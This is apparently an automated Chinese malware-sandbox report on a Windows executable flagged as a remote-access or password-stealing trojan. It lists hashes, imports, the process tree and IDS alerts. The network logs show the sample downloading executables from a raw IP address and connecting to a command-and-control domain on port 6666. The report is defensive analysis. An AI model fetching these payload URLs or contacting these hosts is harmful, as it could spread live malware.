恶意软件分析 & URL链接扫描免费在线病毒分析平台

分析任务

分析类型	虚拟机标签	开始时间	结束时间	持续时间
文件 (Windows)	win7-sp1-x64-shaapp02-1	2024-03-27 13:31:46	2024-03-27 13:33:57	131 秒

魔盾分数

10.0

Single病毒

文件详细信息

文件名	setup查看_6021.exe
文件大小	364552 字节
文件类型	PE32+ executable (GUI) x86-64, for MS Windows
MD5	3ab6e6daed14343b72fc89073d4dcb71
SHA1	c1702727db9983d67035ab745d5eecb448cc24e8
SHA256	a0cf1f2c6ab5027ec9e56207dfc1de8bdda10661a227a647af06df242548f7b8
SHA512	c21efc0d08cc02cb349544119d6624f3ebc844091f3929c7c0867802b8e506155dd224b44d675dacc4df20568c95b92d31a17e5283084c83dfc3cb5f51facb26
CRC32	AE0341FB
Ssdeep	6144:Z75ooZJSkklTC96EJeYW24TiG9qb1aCIaII8I2IIPIbIIEiIvxIqII4IBIPIIVIe:daoP1cqbbf
Yara	登录查看Yara规则
	找不到该样本提交误报

登录查看威胁特征

运行截图

访问主机纪录 (可点击查询WPING实时安全评级)

直接	IP	安全评级	地理位置
否	43.129.30.239	日本
是	8.134.141.179	美国

域名解析 (可点击查询WPING实时安全评级)

域名	安全评级	响应
6021.anonymousrat8.com	未知	A 43.129.30.239
quick.anonymous.vin	未知	A 127.0.0.1

摘要

登录查看详细行为信息

PE 信息

初始地址	0x140000000
入口地址	0x140009a5c
声明校验值	0x00055a18
实际校验值	0x00063795
最低操作系统版本要求	5.2
编译时间	2024-03-27 11:03:36
载入哈希	d0c811fc99f1757a7a70a3b1bb6094e4

版本信息

LegalCopyright
InternalName
FileVersion
CompanyName
LegalTrademarks
Comments
ProductName
ProductVersion
FileDescription
OriginalFilename
Translation

微软证书验证 (Sign Tool)

SHA1	时间戳	有效性	错误
244ac68582b51e81fbca2b3bb80a7711b2203a72	Thu Jan 09 14:27:43 2020	否	WinVerifyTrust returned error 0x80096010

证书链	Certificate Chain 1
发行给	DigiCert Assured ID Root CA
发行人	DigiCert Assured ID Root CA
有效期	Mon Nov 10 080000 2031
SHA1 哈希	0563b8630d62d75abbc8ab1e4bdfb5a899b24d43

证书链	Certificate Chain 2
发行给	DigiCert Assured ID Code Signing CA-1
发行人	DigiCert Assured ID Root CA
有效期	Tue Feb 10 200000 2026
SHA1 哈希	409aa4a74a0cda7c0fee6bd0bb8823d16b5f1875

证书链	Certificate Chain 3
发行给	SHENZHEN THUNDER NETWORKING TECHNOLOGIES LTD.
发行人	DigiCert Assured ID Code Signing CA-1
有效期	Wed Jan 04 200000 2023
SHA1 哈希	0dc3fc827b30d8a6624e46cab7479605ef5c557c

证书链	Timestamp Chain 1
发行给	GlobalSign Root CA
发行人	GlobalSign Root CA
有效期	Fri Jan 28 200000 2028
SHA1 哈希	b1bc968bd4f49d622aa89a81f2150152a41d829c

证书链	Timestamp Chain 2
发行给	GlobalSign Timestamping CA - G2
发行人	GlobalSign Root CA
有效期	Fri Jan 28 200000 2028
SHA1 哈希	c0e49d2d7d90a5cd427f02d9125694d5d6ec5b71

证书链	Timestamp Chain 3
发行给	GlobalSign TSA for MS Authenticode - G2
发行人	GlobalSign Timestamping CA - G2
有效期	Thu Jun 24 080000 2027
SHA1 哈希	63b82fab61f583909695050b00249c502933ec79

PE 数据组成

名称	虚拟地址	虚拟大小	原始数据大小	特征	熵(Entropy)
.text	0x00001000	0x00025e42	0x00026000	IMAGE_SCN_CNT_CODE\|IMAGE_SCN_MEM_EXECUTE\|IMAGE_SCN_MEM_READ	6.42
.rdata	0x00027000	0x0000a35a	0x0000a400	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ	4.74
.data	0x00032000	0x000042e4	0x00001c00	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ\|IMAGE_SCN_MEM_WRITE	2.97
.pdata	0x00037000	0x0000267c	0x00002800	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ	5.25
.reloc	0x0003a000	0x00000754	0x00000800	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_DISCARDABLE\|IMAGE_SCN_MEM_READ	4.31
.rsrc	0x0003b000	0x000204b8	0x00020600	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ	5.05

导入

库: KERNEL32.dll:

• 0x140027000 MultiByteToWideChar

• 0x140027008 DeleteFileA

• 0x140027010 SetEndOfFile

• 0x140027018 CreateFileW

• 0x140027020 CreateFileA

• 0x140027028 WriteConsoleW

• 0x140027030 SetStdHandle

• 0x140027038 GetStringTypeW

• 0x140027040 IsValidLocale

• 0x140027048 EnumSystemLocalesA

• 0x140027050 GetLocaleInfoA

• 0x140027058 GetUserDefaultLCID

• 0x140027060 IsValidCodePage

• 0x140027068 EncodePointer

• 0x140027070 DecodePointer

• 0x140027078 Sleep

• 0x140027080 InitializeCriticalSection

• 0x140027088 DeleteCriticalSection

• 0x140027090 EnterCriticalSection

• 0x140027098 LeaveCriticalSection

• 0x1400270a0 GetLastError

• 0x1400270a8 HeapFree

• 0x1400270b0 HeapAlloc

• 0x1400270b8 HeapReAlloc

• 0x1400270c0 GetProcAddress

• 0x1400270c8 GetModuleHandleW

• 0x1400270d0 ExitProcess

• 0x1400270d8 GetCommandLineW

• 0x1400270e0 GetStartupInfoW

• 0x1400270e8 RaiseException

• 0x1400270f0 RtlPcToFileHeader

• 0x1400270f8 RtlLookupFunctionEntry

• 0x140027100 RtlUnwindEx

• 0x140027108 WideCharToMultiByte

• 0x140027110 LCMapStringW

• 0x140027118 GetCPInfo

• 0x140027120 SetHandleCount

• 0x140027128 GetStdHandle

• 0x140027130 InitializeCriticalSectionAndSpinCount

• 0x140027138 GetFileType

• 0x140027140 UnhandledExceptionFilter

• 0x140027148 SetUnhandledExceptionFilter

• 0x140027150 IsDebuggerPresent

• 0x140027158 RtlVirtualUnwind

• 0x140027160 RtlCaptureContext

• 0x140027168 TerminateProcess

• 0x140027170 GetCurrentProcess

• 0x140027178 HeapSetInformation

• 0x140027180 GetVersion

• 0x140027188 HeapCreate

• 0x140027190 HeapDestroy

• 0x140027198 FatalAppExitA

• 0x1400271a0 WriteFile

• 0x1400271a8 GetModuleFileNameW

• 0x1400271b0 ReadFile

• 0x1400271b8 SetFilePointer

• 0x1400271c0 GetConsoleCP

• 0x1400271c8 GetConsoleMode

• 0x1400271d0 FlushFileBuffers

• 0x1400271d8 CloseHandle

• 0x1400271e0 SetConsoleCtrlHandler

• 0x1400271e8 FreeLibrary

• 0x1400271f0 LoadLibraryW

• 0x1400271f8 GetLocaleInfoW

• 0x140027200 FlsGetValue

• 0x140027208 FlsSetValue

• 0x140027210 FlsFree

• 0x140027218 SetLastError

• 0x140027220 GetCurrentThreadId

• 0x140027228 GetCurrentThread

• 0x140027230 FlsAlloc

• 0x140027238 FreeEnvironmentStringsW

• 0x140027240 GetEnvironmentStringsW

• 0x140027248 QueryPerformanceCounter

• 0x140027250 GetTickCount

• 0x140027258 GetCurrentProcessId

• 0x140027260 GetSystemTimeAsFileTime

• 0x140027268 HeapSize

• 0x140027270 GetACP

• 0x140027278 GetOEMCP

• 0x140027280 GetProcessHeap

库: USER32.dll:

• 0x140027290 CharLowerA

库: WINHTTP.dll:

• 0x1400272a0 WinHttpQueryDataAvailable

• 0x1400272a8 WinHttpOpenRequest

• 0x1400272b0 WinHttpConnect

• 0x1400272b8 WinHttpSendRequest

• 0x1400272c0 WinHttpReceiveResponse

• 0x1400272c8 WinHttpReadData

• 0x1400272d0 WinHttpCloseHandle

• 0x1400272d8 WinHttpOpen

.text
`.rdata
@.data
.pdata
@.reloc
B.rsrc

没有防病毒引擎扫描信息!

进程树

setup_______6021.exe id: 2604
- {48B047C5-7B8E-4f0d-A68C-9EBF23B10D25}.exe id: 2424
  - Thunder.exe id: 2520
explorer.exe id: 1564

setup_______6021.exe, PID: 2604, 上一级进程 PID: 2248

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

{48B047C5-7B8E-4f0d-A68C-9EBF23B10D25}.exe, PID: 2424, 上一级进程 PID: 2604

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

Thunder.exe, PID: 2520, 上一级进程 PID: 2424

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

explorer.exe, PID: 1564, 上一级进程 PID: 1428

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

下载PCAP包

访问主机纪录 (可点击查询WPING实时安全评级)

直接	IP	安全评级	地理位置
否	43.129.30.239	日本
是	8.134.141.179	美国

TCP

源地址	源端口	目标地址	目标端口
192.168.122.201	49161	23.206.229.165	80
192.168.122.201	49169	43.129.30.239 6021.anonymousrat8.com	6666
192.168.122.201	49170	43.129.30.239 6021.anonymousrat8.com	6666
192.168.122.201	49171	43.129.30.239 6021.anonymousrat8.com	6666
192.168.122.201	49201	43.129.30.239 6021.anonymousrat8.com	6666
192.168.122.201	49160	8.134.141.179	80
192.168.122.201	49162	8.134.141.179	80
192.168.122.201	49163	8.134.141.179	80

UDP

源地址	源端口	目标地址	目标端口
192.168.122.201	53118	192.168.122.1	53
192.168.122.201	57526	192.168.122.1	53
192.168.122.201	60155	192.168.122.1	53
192.168.122.201	63246	192.168.122.1	53
192.168.122.201	63472	192.168.122.1	53

域名解析 (可点击查询WPING实时安全评级)

域名	安全评级	响应
6021.anonymousrat8.com	未知	A 43.129.30.239
quick.anonymous.vin	未知	A 127.0.0.1

TCP

源地址	源端口	目标地址	目标端口
192.168.122.201	49161	23.206.229.165	80
192.168.122.201	49169	43.129.30.239 6021.anonymousrat8.com	6666
192.168.122.201	49170	43.129.30.239 6021.anonymousrat8.com	6666
192.168.122.201	49171	43.129.30.239 6021.anonymousrat8.com	6666
192.168.122.201	49201	43.129.30.239 6021.anonymousrat8.com	6666
192.168.122.201	49160	8.134.141.179	80
192.168.122.201	49162	8.134.141.179	80
192.168.122.201	49163	8.134.141.179	80

UDP

源地址	源端口	目标地址	目标端口
192.168.122.201	53118	192.168.122.1	53
192.168.122.201	57526	192.168.122.1	53
192.168.122.201	60155	192.168.122.1	53
192.168.122.201	63246	192.168.122.1	53
192.168.122.201	63472	192.168.122.1	53

HTTP 请求

URI	HTTP数据
URL专业沙箱检测 -> http://8.134.141.179/1179	GET /1179 HTTP/1.1 Connection: Keep-Alive User-Agent: huorong Host: 8.134.141.179
URL专业沙箱检测 -> http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip	GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1 Accept: / If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT User-Agent: IPM Host: acroipm.adobe.com Connection: Keep-Alive Cache-Control: no-cache
URL专业沙箱检测 -> http://8.134.141.179/wj-1179.txt	GET /wj-1179.txt HTTP/1.1 User-Agent: RookIE/1.0 Host: 8.134.141.179
URL专业沙箱检测 -> http://8.134.141.179/wj/6021_64.bin	GET /wj/6021_64.bin HTTP/1.1 User-Agent: RookIE/1.0 Host: 8.134.141.179
URL专业沙箱检测 -> http://8.134.141.179/wj/1.exe	GET /wj/1.exe HTTP/1.1 User-Agent: RookIE/1.0 Host: 8.134.141.179
URL专业沙箱检测 -> http://8.134.141.179/wj/1.dll	GET /wj/1.dll HTTP/1.1 User-Agent: RookIE/1.0 Host: 8.134.141.179
URL专业沙箱检测 -> http://8.134.141.179/wj/quick.exe	GET /wj/quick.exe HTTP/1.1 User-Agent: RookIE/1.0 Host: 8.134.141.179
URL专业沙箱检测 -> http://8.134.141.179/wj/qq.exe	GET /wj/qq.exe HTTP/1.1 User-Agent: RookIE/1.0 Host: 8.134.141.179

SMTP 流量

无SMTP流量.

IRC 流量

无IRC请求.

ICMP 流量

无ICMP流量.

CIF 报告

无 CIF 结果

网络警报

Timestamp	Source IP	Source Port	Destination IP	Destination Port	Protocol	SID	Signature	Category
2024-03-27 13:32:09.017781+0800	192.168.122.201	49162	8.134.141.179	80	TCP	2003635	ET TROJAN Generic Password Stealer User Agent Detected (RookIE)	A Network Trojan was detected
2024-03-27 13:32:16.876095+0800	192.168.122.201	49163	8.134.141.179	80	TCP	2003635	ET TROJAN Generic Password Stealer User Agent Detected (RookIE)	A Network Trojan was detected
2024-03-27 13:32:16.876095+0800	192.168.122.201	49163	8.134.141.179	80	TCP	2018752	ET TROJAN Generic .bin download from Dotted Quad	A Network Trojan was detected
2024-03-27 13:32:17.236604+0800	192.168.122.201	49163	8.134.141.179	80	TCP	2003635	ET TROJAN Generic Password Stealer User Agent Detected (RookIE)	A Network Trojan was detected
2024-03-27 13:32:17.236604+0800	192.168.122.201	49163	8.134.141.179	80	TCP	2018581	ET TROJAN Single char EXE direct download likely trojan (multiple families)	A Network Trojan was detected
2024-03-27 13:32:17.307450+0800	8.134.141.179	80	192.168.122.201	49163	TCP	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
2024-03-27 13:32:18.343144+0800	192.168.122.201	49163	8.134.141.179	80	TCP	2003635	ET TROJAN Generic Password Stealer User Agent Detected (RookIE)	A Network Trojan was detected
2024-03-27 13:32:19.364169+0800	192.168.122.201	49163	8.134.141.179	80	TCP	2003635	ET TROJAN Generic Password Stealer User Agent Detected (RookIE)	A Network Trojan was detected
2024-03-27 13:32:30.251664+0800	192.168.122.201	49169	43.129.30.239	6666	TCP	2260003	SURICATA Applayer Protocol detection skipped	Generic Protocol Command Decode
2024-03-27 13:32:21.232980+0800	192.168.122.201	49163	8.134.141.179	80	TCP	2003635	ET TROJAN Generic Password Stealer User Agent Detected (RookIE)	A Network Trojan was detected
2024-03-27 13:32:21.232980+0800	192.168.122.201	49163	8.134.141.179	80	TCP	2019714	ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
2024-03-27 13:32:21.447753+0800	192.168.122.201	49163	8.134.141.179	80	TCP	2003635	ET TROJAN Generic Password Stealer User Agent Detected (RookIE)	A Network Trojan was detected
2024-03-27 13:32:21.447753+0800	192.168.122.201	49163	8.134.141.179	80	TCP	2018581	ET TROJAN Single char EXE direct download likely trojan (multiple families)	A Network Trojan was detected
2024-03-27 13:32:22.124791+0800	192.168.122.201	49163	8.134.141.179	80	TCP	2003635	ET TROJAN Generic Password Stealer User Agent Detected (RookIE)	A Network Trojan was detected

TLS

No TLS

Suricata HTTP

No Suricata HTTP

未发现网络提取文件

抱歉! 没有任何文件投放。

没有发现相似的分析.

HTML 总结报告 (需15-60分钟同步)	下载

Processing ( 60.473 seconds )

21.441 BehaviorAnalysis
14.494 NetworkAnalysis
12.61 Suricata
9.76 VirusTotal
1.407 Static
0.387 TargetInfo
0.346 peid
0.014 Strings
0.01 AnalysisInfo
0.003 Memory
0.001 config_decoder

Signatures ( 47.776 seconds )

35.797 network_http
1.685 proprietary_url_bl
1.589 antiav_detectreg
1.238 antidbg_windows
0.982 api_spamming
0.82 stealth_timeout
0.776 stealth_decoy_document
0.498 infostealer_ftp
0.337 antianalysis_detectreg
0.296 antivm_generic_scsi
0.276 infostealer_im
0.27 antivm_vbox_window
0.251 antivm_generic_services
0.239 anormaly_invoke_kills
0.18 antisandbox_script_timer
0.168 infostealer_mail
0.14 antisandbox_sunbelt_libs
0.13 antiav_avast_libs
0.11 antiav_bitdefender_libs
0.109 antisandbox_sboxie_libs
0.085 antivm_parallels_keys
0.081 kibex_behavior
0.08 antivm_xen_keys
0.078 darkcomet_regkeys
0.067 process_interest
0.065 webmail_phish
0.06 injection_runpe
0.06 geodo_banking_trojan
0.058 betabot_behavior
0.056 antivm_generic_diskreg
0.055 stealth_file
0.046 vawtrak_behavior
0.045 mimics_filetime
0.043 virus
0.04 reads_self
0.04 recon_fingerprint
0.036 generic_phish
0.036 secure_login_phish
0.035 antivm_generic_disk
0.034 bootkit
0.033 network_execute_http
0.032 network_document_http
0.032 process_needed
0.031 antivm_vpc_keys
0.029 antivm_vbox_keys
0.028 stealth_network
0.028 antivm_vmware_keys
0.028 packer_armadillo_regkey
0.027 antisandbox_productid
0.027 antivm_xen_keys
0.027 antivm_hyperv_keys
0.027 antivm_vbox_acpi
0.026 hancitor_behavior
0.026 bypass_firewall
0.025 proprietary_anomaly_invoke_vb_vba
0.024 wscript_downloader_http
0.023 office_dl_write_exe
0.017 kovter_behavior
0.014 antiemu_wine_func
0.014 infostealer_browser_password
0.014 antiav_detectfile
0.013 antivm_generic_bios
0.013 antivm_generic_cpu
0.013 antivm_generic_system
0.013 recon_programs
0.012 anomaly_persistence_autorun
0.012 shifu_behavior
0.012 proprietary_domain_bl
0.01 infostealer_bitcoin
0.007 proprietary_malicious_write_executeable_under_temp_to_regrun
0.007 proprietary_anomaly_massive_file_ops
0.006 proprietary_anomaly_write_exe_and_obsfucate_extension
0.006 antivm_vbox_files
0.006 ransomware_extensions
0.006 ransomware_files
0.005 antivm_vbox_libs
0.005 antiemu_wine_reg
0.004 dridex_behavior
0.004 anomaly_persistence_bootexecute
0.004 injection_createremotethread
0.004 sets_autoconfig_url
0.004 creates_largekey
0.004 creates_nullvalue
0.004 securityxploded_modules
0.003 hawkeye_behavior
0.003 proprietary_anomaly_write_exe_and_dll_under_winroot_run
0.003 anomaly_reset_winsock
0.003 ransomware_message
0.003 ipc_namedpipe
0.003 exec_crash
0.003 nymaim_behavior
0.003 cerber_behavior
0.003 disables_browser_warn
0.003 network_torgateway
0.002 proprietary_anomaly_terminated_process
0.002 tinba_behavior
0.002 rat_nanocore
0.002 disables_spdy
0.002 infostealer_browser
0.002 network_anomaly
0.002 rat_luminosity
0.002 antisandbox_sleep
0.002 dead_connect
0.002 disables_wfp
0.002 antidbg_devices
0.002 browser_security
0.002 modify_proxy
0.002 proprietary_bad_drop
0.001 network_tor
0.001 office_write_exe
0.001 antivm_vmware_libs
0.001 injection_explorer
0.001 kelihos_behavior
0.001 Locky_behavior
0.001 kazybot_behavior
0.001 dyre_behavior
0.001 antianalysis_detectfile
0.001 antivm_vmware_files
0.001 banker_zeus_mutex
0.001 bot_drive
0.001 bot_drive2
0.001 browser_addon
0.001 disables_system_restore
0.001 codelux_behavior
0.001 malicous_targeted_flame
0.001 proprietary_malicious_drop_executable_file_to_temp_folder
0.001 network_cnc_http
0.001 rat_pcclient
0.001 stealth_modify_uac_prompt

Reporting ( 0.759 seconds )

0.632 ReportHTMLSummary
0.127 Malheur


Task ID	743105
Mongo ID	6603b063dc327bb8978bebe5
Cuckoo release	1.4-Maldun